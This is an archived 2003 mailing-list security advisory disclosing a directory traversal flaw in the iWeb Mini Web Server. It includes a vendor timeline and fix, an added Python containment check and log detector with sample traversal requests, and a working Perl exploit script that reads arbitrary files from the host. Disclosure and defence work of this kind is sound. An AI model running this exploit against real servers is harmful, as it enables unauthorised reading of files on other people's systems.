[VulnWatch] SFAD03-001: iWeb Mini Web Server Remote Directory Traversal

From: subversive (subversive@linuxmail.org)
Date: 04/16/03

    From: "subversive " <subversive@linuxmail.org>
    To: vulnwatch@vulnwatch.org
    Date: Wed, 16 Apr 2003 16:24:13 +1200

      [=================================================================]
      [...............:[ S e c u r i t y F r e a k s ]:...............]
      [.................:[ www.securityfreaks.com ]:..................]
      [=================================================================]

    Title : iWeb Mini Web Server Remote Directory Traversal
    Risk : Moderate - Low
    Software : iWeb Mini Web Server
    Platforms : Windows NT/XP/9x
    Vendor URL : http://www.ashleybrown.co.uk/iweb/
    Discovered by : subversive <subversive@linuxmail.org>
    Advisory ID : SFAD03-001

    .....:[ Overview :

    The iWeb Mini Web Server is a small web server designed for use on
    intranets and for testing websites in a realistic environment.

    .....:[ Details :

    iWeb does not filter ../ sequences out of the path in GET requests,
    which allows a remote client to escape the webroot and traverse the
    directory structure of the host.
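    The following is an added example, not part of the advisory or of iWeb
    itself: it shows the webroot containment check a server needs in order
    to reject the request shape described above, and a small detector that
    runs the same check over constructed access-log lines. It goes slightly
    beyond the literal ../ case by also handling percent-encoded dots and
    backslash separators (the affected platform is Windows); the webroot,
    default document and log lines are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Constructed access-log lines in common log format (not from the advisory).
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Apr/2003:16:24:13 +1200] "GET /index.html HTTP/1.0" 200 512',
    '10.0.0.5 - - [16/Apr/2003:16:24:14 +1200] "GET /../../../../../../../../../target.txt HTTP/1.0" 200 88',
    '10.0.0.5 - - [16/Apr/2003:16:24:15 +1200] "GET /%2e%2e/%2e%2e/target.txt HTTP/1.0" 200 88',
]

def normalize_request_path(request_path):
    """Decode and lexically normalize the path part of a request URI."""
    path = request_path.split("?", 1)[0]          # drop the query string
    # Decode once so %2e%2e%2f is seen as ../; treat backslashes as
    # separators because the server runs on Windows.
    path = unquote(path).replace("\\", "/")
    # Normalize as a relative path: normpath keeps leading '..' segments
    # for relative input, whereas for absolute input it silently drops them.
    return posixpath.normpath(path.lstrip("/"))

def resolve_under_webroot(webroot, request_path):
    """Return the file path for request_path, or None if it escapes webroot."""
    rel = normalize_request_path(request_path)
    if rel == ".." or rel.startswith("../"):
        return None                                # would escape the webroot
    if rel == ".":
        rel = "index.html"                         # assumed default document
    return posixpath.join(webroot, rel)

def flag_traversal_requests(log_lines):
    """Return request targets in the log lines that would escape the webroot."""
    hits = []
    for line in log_lines:
        fields = line.split('"')                   # request line is the first quoted field
        if len(fields) < 2:
            continue
        request = fields[1].split()                # e.g. ['GET', '/index.html', 'HTTP/1.0']
        if len(request) < 2:
            continue
        if resolve_under_webroot("/webroot", request[1]) is None:
            hits.append(request[1])
    return hits

if __name__ == "__main__":
    for target in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", target)
```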

    .....:[ Vendor Status :

    14/04/03 Initial Contact Made
    15/04/03 Vendor Responded
    15/04/03 Vendor Released Updated Version

    .....:[ Solution :

    Remove the old iWeb application, then download and install the
    updated version, which can be found at:

    http://ashleybrown.co.uk/downloads/iws2.exe

    .....:[ Exploit - SF-iwsuk.pl :

    #!/usr/bin/perl -w
    #
    # S e c u r i t y F r e a k s
    # www.securityfreaks.com
    #
    # iWeb Mini Web Server Remote Directory Traversal
    #
    # subversive[at]linuxmail.org - *15/04/2003*

    use IO::Socket;

    # Host and file are required; print usage and quit if either is missing
    if(!$ARGV[0] || !$ARGV[1]) {
        print <<"IWEBSUK";

       S e c u r i t y F r e a k s
         www.securityfreaks.com

      -------------------------------------------------------------
      SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
      -------------------------------------------------------------
      Usage: $0 <host> <file> <port>

    IWEBSUK
        exit;
    }
    else {
        $host = $ARGV[0];
    }

    # Port defaults to 80 when not given on the command line
    if(!$ARGV[2]) {
        $port = "80";
    }
    else {
        $port = $ARGV[2];
    }

    my $sock = new IO::Socket::INET ( Proto => "tcp",
                                      PeerAddr => $host,
                                      PeerPort => $port,
                                    );
    die "\nConnection to $host:$port failed\n" unless $sock;

    print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
    while(<$sock>) { print }
    close($sock);
    print("\n\n");
    exit;

